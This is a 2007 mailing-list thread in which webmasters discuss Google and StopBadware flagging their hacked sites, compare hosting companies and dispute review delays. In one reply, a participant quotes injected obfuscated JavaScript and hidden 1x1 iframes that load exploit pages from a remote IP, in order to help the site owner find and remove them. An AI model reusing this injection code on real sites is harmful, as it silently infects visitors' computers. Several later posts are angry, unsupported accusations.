informing site admins first

11 views
Skip to first unread message

bradc

unread,
Apr 19, 2007, 1:24:20 PM4/19/07
to stopbadware
Why couldn't Google and/or StopBadware alert site admins *before*
flagging their sites? I only learned the other day that my site,
bradcook.net, was flagged because someone had done a Google search on
my name. I have no idea how long it had been that way. I checked my
index.html page and, sure enough, the offending java code was there,
so I immediately deleted it and changed my password to something
completely random (unfortunately, my password had been, admittedly,
something that probably could have been cracked via a dictionary
attack).

If I had been alerted first, though, I could have taken care of it
immediately and not been stuck with a warning that could take weeks,
if not months, to remove. My email address and phone number are both
on the site's front page. I would have happily complied immediately.

jac...@gmail.com

unread,
Apr 19, 2007, 2:15:29 PM4/19/07
to stopb...@googlegroups.com
On 4/19/07, bradc <br...@bradcook.net> wrote:
> Why couldn't Google and/or StopBadware alert site admins *before*
> flagging their sites?

How did you find out about your interstitialed google listing? I
remember hearing a while back that they would retake into
consideration the idea of letting webmasters know, despite the
difficulties of procuring any sort of legitimate contact information.

The answer to your question is that if Google doesn't blacklist your
site when it knows there is malware (intentfully or not on the site's
part), Google becomes ethically responsible for distributing malware.

If Google truly attempts to follow their motto, they are obligated to
inform webmasters. The archives demonstrate StopBadware's hesitation
over contacting the ISP (I assume this is the web host). Why? Surely
they aren't so ornery as to lose customers over a resolvable issue.
And isn't the problem often with the host to begin with? It seems the
web host would also be in a good technical position to help inexpert
webmasters, possibly making StopBadware's job easier.

-jake

bradc

unread,
Apr 19, 2007, 5:09:19 PM4/19/07
to stopbadware
As I said, I found out about it because someone did a search on my
name and saw the warning. (Yes, I suppose he visited my site first
before emailing me; I told him later about what happened, so he knows
his computer could be affected by this.)

I have to admit I don't have a ton of confidence in my hosting
company, iPowerWeb. I've thought about switching, but I hate to deal
with the 2-3 days of email blackout while the DNS addresses
repopulate. I told an iPowerWeb rep about what happened and they
didn't seem too concerned. I am not a very experienced Webmaster, so
I'm tempted to find someone else who can host my site and be more
helpful, even if it costs me more money.

Any suggestions for good hosting companies are welcome.

Thanks.

- Brad

On Apr 19, 11:15 am, jac...@gmail.com wrote:

victoriav

unread,
Apr 19, 2007, 6:38:47 PM4/19/07
to stopbadware
Hi Brad

I lost confidence in my host also, and moved 8 websites after the
hacking and planting of bad codes on one of my sites. The host/server
where the intrusion occurred used to be owned by a man who was really
on top of things. I wonder if any host is truly immune to hackings -
but this first guy caught everything immediately - and he sent out
emails to inform his clients when an attempt occurred. I think his
expertise held them at bay and he kept us safe. He then sold his
server to 2 people who were not as experienced. I ask myself, (and
should have asked them) why didn't they inform us when they realized
the ISP was hacked into, and someone ran software that gathered
usernames and passwords, which enabled the hackers to plant bad codes
on several sites on 3 different servers. Had the new owners let us
know, we could have nabbed it immediately.

I had 2 other hosts at the same time - bigger ones. So I now moved
those sites to one of them. I think it's a good idea to ask all of
these security questions before you choose a host. I never did - but
I would definitely choose security first should I move again. I would
ask what type of security they have in force and if they can catch
intruders before they manage to get in and do any damage. Ask if they
keep clients informed of attempts or breakins.

I use hostgator.com and hostmonster.com. I have not had any problems
with either of them, but recently needed tech support with one of the
sites I have on hostgater.com. They are pretty good and fast to reply
to emails. You can also phone them, which is a plus. I think it's
best to stick with a larger, well established host. Thus far, none of
the sites have been down. Hostgator.com recently upgraded ISPs too
for more efficiency, but it didn't affect the websites. They sent out
emails to alert everyone beforehand. To me, this is a sign of a good
host. I hope :-)

I am also going to make sure I set good passwords and change them from
time to time. I met some nice people on this board, and we keep in
touch. Stopbadware sent some helpful links to one member here, who
passed them on to me. They are security measures you can take. I'll
pass them on. One thing we all learned is to take better
precautions. Once you get over the initial shock of being flagged,
you realize these people are in it for the good, and when your site is
clean, they'll remove the warning. We're all in this together, and
working together is good. Hang in there and things will be ok.


Victoria

jac...@gmail.com

unread,
Apr 19, 2007, 7:02:25 PM4/19/07
to stopb...@googlegroups.com
On 4/19/07, victoriav <victo...@gmail.com> wrote:
> I use hostgator.com and hostmonster.com. I have not had any problems
> with either of them, but recently needed tech support with one of the
> sites I have on hostgater.com. They are pretty good and fast to reply
> to emails. You can also phone them, which is a plus. I think it's
> best to stick with a larger, well established host. Thus far, none of
> the sites have been down. Hostgator.com recently upgraded ISPs too
> for more efficiency, but it didn't affect the websites. They sent out
> emails to alert everyone beforehand. To me, this is a sign of a good
> host. I hope :-)

I've also heard good things about (http://hostgator.com). I use
(http://www.nearlyfreespeech.net), which is good for my nearly
no-traffic site. (http://whreviews.com) looks like a reliable site for
web host reviews.

I wonder if you guys at Stop Badware might have any shareable data on
particularly bad web hosts, as far as malware and insecurity goes?

-jake

Erica George

unread,
Apr 19, 2007, 7:44:58 PM4/19/07
to stopb...@googlegroups.com
Hi Jake,

We're actually researching web hosts right now. We should have some preliminary data to share in the near future. We're also hoping we'll be able to work with hosting providers and help them to address these issues proactively, because as you note web hosts are in a great position not only to increase security for their hosted sites, but to educate webmasters about best security practices on their ends (from secure passwords to updating software).

Erica
StopBadware staff

victoriav

unread,
Apr 22, 2007, 7:04:10 PM4/22/07
to stopbadware
Hi Erica

Involving hosts is a wonderful idea, as the host is basically the root
of it all. Having a secure host will help us tremendously. I just
wanted to share something about my second host. I gave great feedback
about hostgator.com, but today I encountered a php database issue
with my php mailing list. I was able to call hostmonster.com on the
phone (my second hosting company), get a tech online within a few
moments, and he actually had the knowledge to fix my database, which
is extremely rare as most hosts say they are not responsible for
anything in cpanel. This doesn't guarantee that every tech will have
that expertise, but I wanted to let others know that hostmonster.com
gives fabulous customer service and I recommend them.

Victoria

Larry Launstein Jr

unread,
Apr 23, 2007, 9:58:37 PM4/23/07
to stopbadware
I'm not surprised by iPower's response or lack thereof. Durand
Railroad Days is hosted by them, and I have been trying to get them
off for the last couple of years.

I and all but them left iPower because iPower got a bit too inflated
for their own good.

I sent them an e-mail insisting that the problem be addressed
immediately.

On Apr 19, 5:09 pm, bradc <b...@bradcook.net> wrote:

beckerel...@yahoo.com

unread,
Apr 23, 2007, 10:57:18 PM4/23/07
to stopbadware
During a routine checkup of our web site www.beckerelectronics.com we
noticed that our web site was flagged by Google, we have checked our
web pages and found no badware, we have sent numerous emails to
stopbadware.org also Google and got no respond, Actually two emails
that had nothing to do we our request. Here is a copy of the email
from stopbadware.org

First email from app...@stopbadware.org

To: Beckerel...@yahoo.com
Subject: Re: Please Review our web site "www.beckerelectronics.com"
Date: Thu, 19 Apr 2007 16:09:28 -0400 (EDT)
From: app...@stopbadware.org Add to Address Book Add Mobile Alert

StopBadware.org no longer accepts appeals submitted via email. If you
would like us to review the inclusion of your site in the Badware
Website Clearinghouse, please go to http://stopbadware.org/home/review
to
fill out a Request for Review form.

The StopBadware Team

----------------------
second Email was sent to: con...@stopbadware.org, on this email we
requested they review our web site and got this email

To:beckerel...@yahoo.com
Subject: Re: Badware???? www.beckerelectronics.com
Date: Wed, 18 Apr 2007 13:53:18 -0400 (EDT)
From: con...@stopbadware.org Add to Address BookAdd to Address Book
Add Mobile Alert

Thank you for contacting Stopbadware.org. Your input helps us build a
community and resources to help us stop this growing threat. Your
comments and suggestions are welcome.

Unfortunately, we receive so much feedback that we may not have time
to
respond to every suggestion and question, though we do read all of
it.

If you want to participate and become part of this community, learn
how
to get involved by going here:

http://www.stopbadware.org/home/get_involved

If you are looking for technical support with a badware issue,
stopbadware.org does not offer direct support. Please visit our 'How
do I get
rid of badware' section for some helpful links:

http://www.stopbadware.org/home/help%2Fhelp_remove

Stopbadware.org does not currently endorse any sites or products, but
we do want to point you in the right direction so that you can find
the
resources you need to make informed decisions about removing these
programs.

Thank You,
The Stopbadware.org Team
----------------------

At this time I don't even think that stopbadware.org has the capacity
to check all flagged websites and I'm not sure we even get any
results, our web site still shows in the first or second place on most
search engines and still first on google with flagged message, I'm not
sure what the damage will be and how this will effect our revenue and
reputation of our web site, but someone has to be responsible for lost
revenue. If we don't get any respond our next option is to remove our
web pages from google permanently.
Best regards
Vic


Panayiotis Mavrommatis

unread,
Apr 23, 2007, 11:54:52 PM4/23/07
to stopbadware
I just viewed the source of your main page. Towards the bottom there's
some obfuscated JavaScript and iframes:

<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA
%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC
%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC
%B0%E6%F1%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE
%C0%A9%B7%BC%AC%B8%E3%EF%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE
%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1.length;i+=3)
{tmp = unescape(str1.slice(i,i+3));str=str
+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</
script>
<iframe src='http://81.95. 148.35/upload/pic/' width=1 height=1></
iframe>
<iframe src='http://81.95. 148.35/upload/12343/new111.php?adv=168'
width=1 height=1></iframe>

This code fetches the two urls from a remote server in two tiny
(1x1pixel) frames. (I put a space so you don't accidentally click on
them). The urls deliver exploits and lots of malware to unprotected
visitors. If you visited your site with IE and Windows, you might want
to virus scan your PC as well.

Follow the steps described on stopbadware's help pages to
- remove this code
- investigate how this code was inserted in your website
- make sure your server is secure and this won't happen again
- file for an appeal (review).

On Apr 23, 7:57 pm, "beckerelectron...@yahoo.com"


<beckerelectron...@yahoo.com> wrote:
> During a routine checkup of our web sitewww.beckerelectronics.comwe
> noticed that our web site was flagged by Google, we have checked our
> web pages and found no badware, we have sent numerous emails to
> stopbadware.org also Google and got no respond, Actually two emails
> that had nothing to do we our request. Here is a copy of the email
> from stopbadware.org
>

> First email from appe...@stopbadware.org
>
> To: Beckerelectron...@yahoo.com


> Subject: Re: Please Review our web site "www.beckerelectronics.com"
> Date: Thu, 19 Apr 2007 16:09:28 -0400 (EDT)

> From: appe...@stopbadware.org Add to Address Book Add Mobile Alert


>
> StopBadware.org no longer accepts appeals submitted via email. If you
> would like us to review the inclusion of your site in the Badware

> Website Clearinghouse, please go tohttp://stopbadware.org/home/review


> to
> fill out a Request for Review form.
>
> The StopBadware Team
>
> ----------------------

> second Email was sent to: cont...@stopbadware.org, on this email we


> requested they review our web site and got this email
>

> To:beckerelectron...@yahoo.com
> Subject: Re: Badware????www.beckerelectronics.com


> Date: Wed, 18 Apr 2007 13:53:18 -0400 (EDT)

> From: cont...@stopbadware.org Add to Address BookAdd to Address Book

Larry Launstein Jr

unread,
Apr 25, 2007, 3:11:07 PM4/25/07
to stopbadware
I think Google and Stop Badware.com have a good idea, but I think they
need to inform the webmaster before putting up a warning, and also
give the webmaster the information they need to get rid of the
offending stuff.

All the sites I do have my company's name with a link back to my site.
There is no excuse why I could not have been contacted directly.

What has happened is that Durand Railroad Days now has a black mark
next to its good name just because some jerk found a way to hack into
iPowerWeb. We designers should not have to pay the price for this, nor
should our clients. It is a horrible business practice both Google and
Stop Badware have embarked on. This is a potential lawsuit waiting to
happen.

What has happened is unfair to Durand Railroad Days, and to me.

pablo....@gmail.com

unread,
Apr 25, 2007, 3:42:46 PM4/25/07
to stopb...@googlegroups.com
"I think Google and Stop Badware.com have a good idea, but I think they need
to inform the webmaster before putting up a warning, and also give the
webmaster the information they need to get rid of the offending stuff."
--------------------------

Many of us readers, users, and web developers think as you do too.

In fact, personally I couldn't agree more.

However when I posted such a idea I was responded with both ignorance and
arrogance.
http://groups.google.com/group/stopbadware/browse_thread/thread/bf3c99191371
7e4d/0744836e1f61ec14?lnk=gst&q=standard&rnum=6#0744836e1f61ec14

Some people even think this unexpected workflow from Stopbadware is
intentional, making web advertising only good if it comes from "adwords" /
"adsense".

Personally I only can affirm, that current method is certainly destructive
for many Nonbadware sites.

Hope somebody listens to you at stopbadware.

I really like to think they are noble people working for safer browsing and
not anything else.

Pablo Silvio Esquivel
A Higher Standard Webmaster
www.logosbr.com/

Larry Launstein Jr

unread,
Apr 25, 2007, 4:18:11 PM4/25/07
to stopbadware
A big lawsuit would wake everyone up big time.

On Apr 25, 3:42 pm, <pablo.logo...@gmail.com> wrote:
> "I think Google and Stop Badware.com have a good idea, but I think they need
> to inform the webmaster before putting up a warning, and also give the
> webmaster the information they need to get rid of the offending stuff."
> --------------------------
>
> Many of us readers, users, and web developers think as you do too.
>
> In fact, personally I couldn't agree more.
>
> However when I posted such a idea I was responded with both ignorance and

> arrogance.http://groups.google.com/group/stopbadware/browse_thread/thread/bf3c9...

beckerel...@yahoo.com

unread,
Apr 25, 2007, 10:49:18 PM4/25/07
to stopbadware
Hi Erica,
Can you explain how would your staff can check around 70,000 flagged
web sites? Our site www.beckerelectronics.com was flagged and we still
got no result, i was told i should get an email in 2 days and that
also passed,
Vic
-------------------

Erica George

unread,
Apr 26, 2007, 10:39:37 AM4/26/07
to stopb...@googlegroups.com
Hi Vic,

I'm not sure where you were told that you would be emailed in 2 days. We make every effort to process sites that appeal within 10 business days, though a handful of sites have had more complexs situations that required further testing beyond that. It is true that if a site is already 100% clean when it is first re-tested, the turnaround time is usually quite quick, and it usually is no more than 2 business days. But no-one at StopBadware would have made the promise that your review would be processed that quickly, because until a site is actually re-tested we have no way of knowing if it will be one of the quick already-clean sites or a still-infected site that will take longer. I'm happy to look into the status of your site's review.

I'd also like to clarify something about the reviews. No, we absolutely are not reviewing 70,000 sites. That's the number of sites in the Clearinghouse. Some of them are intentionally distributing badware and have no desire to appeal. Some of them are link farms who would possibly prefer not to distribute badware, but whose shady business models rely on linking to huge numbers of other sites without taking time to verify their safety. Many of the sites listed in the Clearinghouse are the URLs actively hosting badware to which innocent sites that have been hacked unintentionally link. In any case, though our load spiked higher in March, we're currently receiving more like 100 to 125 requests for review per day. We now have a technical system that can handle the load - when the first influx of hacked sites began, we were working with a technical system designed to handle more like 100 sites per month. We also now have plenty of well-trained interns to staff our testing. So no, we aren't processing 70,000 sites at once. But we are processing over 3,000 reviews a month, and have capacity to process more.

Erica
StopBadware staff


> > (http://www.nearlyfreespeech.net ), which is good for my nearly

Bu33411

unread,
Apr 26, 2007, 2:43:13 PM4/26/07
to stopbadware
Pablo I worked in Harvard back in 1984 85, in High Energy Physics
Department 42 Oxford street, Cambridge Mass, and quit after while, We
are the worlds largest Garbage producer, HARVARD PRODUCES THE MOST,
some examples are Enron executives? So if Harvard is involved then
forget about it. not to mention the 2 nerds from google that are
billionaires.

-------------------------------------------------------------------------------------

On Apr 25, 12:42 pm, <pablo.logo...@gmail.com> wrote:
> "I think Google and Stop Badware.com have a good idea, but I think they need
> to inform the webmaster before putting up a warning, and also give the
> webmaster the information they need to get rid of the offending stuff."
> --------------------------
>
> Many of us readers, users, and web developers think as you do too.
>
> In fact, personally I couldn't agree more.
>
> However when I posted such a idea I was responded with both ignorance and

> arrogance.http://groups.google.com/group/stopbadware/browse_thread/thread/bf3c9...

Larry Launstein Jr

unread,
Apr 26, 2007, 5:04:27 PM4/26/07
to stopbadware
Erica:

Thank you and your organization for removing the flag from Durand
Railroad Days. It was never their intention, nor mine, to promote the
spread of badware. It just upset me a lot that they had this happen
just before their event. It was also no fault of my own, nor Durand
Railroad Days, Inc., for some jerk hacking into the system.

> On 4/25/07, beckerelectron...@yahoo.com <beckerelectron...@yahoo.com> wrote:
>
>
>
> > Hi Erica,
> > Can you explain how would your staff can check around 70,000 flagged

> > web sites? Our sitewww.beckerelectronics.comwas flagged and we still

> > > > (http://www.nearlyfreespeech.net), which is good for my nearly

beckerel...@yahoo.com

unread,
May 2, 2007, 10:33:10 PM5/2/07
to stopbadware
Hi Erica,
I sent you 2 emails and got no respond, i still have the original
email that i received from one of your colleges that said it will take
one or two days, according to your estimate the 10 days period is also
passed, as i mentioned in my email i wouldn't think that your
organisation could handle all the load and i was correct since you can
not even reply to an email, we have registered a new website and we
will run it against stopbadware.org and google, your name will be the
first in our list, at this point we do not care if you remove our web
site from list or not since we will remove our site from google, the
general public should consider you illegitimate since no one requested
for your service, i agree with Bu33411 post, we do producer the worlds
largest garbage and Harvard defiantly produces the Most. at this point
you need one of your own that likes to make a fame to stand against
you.

Vic

PS. I'm sure this page will be shown by google and millions will see
the post
==================================================================================================

> On 4/25/07, beckerelectron...@yahoo.com <beckerelectron...@yahoo.com> wrote:
>
>
>
> > Hi Erica,
> > Can you explain how would your staff can check around 70,000 flagged

> > web sites? Our sitewww.beckerelectronics.comwas flagged and we still

> > > > (http://www.nearlyfreespeech.net), which is good for my nearly

beckerel...@yahoo.com

unread,
May 2, 2007, 10:56:20 PM5/2/07
to stopbadware
Brad remove your web site from Google, they flagged so many web sites
that has nothing to do with badware, i actually check their flagged
web sites and had no problems with badware, usually the sites that
contains badware are porn sites and hack sites, anyone visits this
sites already knows they have a chane to get virus, according to many
experts stopbadware will not last long and they are not capable to
help you in any way, our site does not have any badware and was
flagged by google, we have sent numerous massages to stopbadware and
got no respond, i have personally sent many emails to Erica George
that claims to be one of the stopbadware staff and did not get any
respond.
Vic
www.beckerelectronics.com

PS. there is an alternate way that you can have your site listed on
google in less than 2-3 days in top ten,
===============================================================================================

Reply all
Reply to author
Forward
0 new messages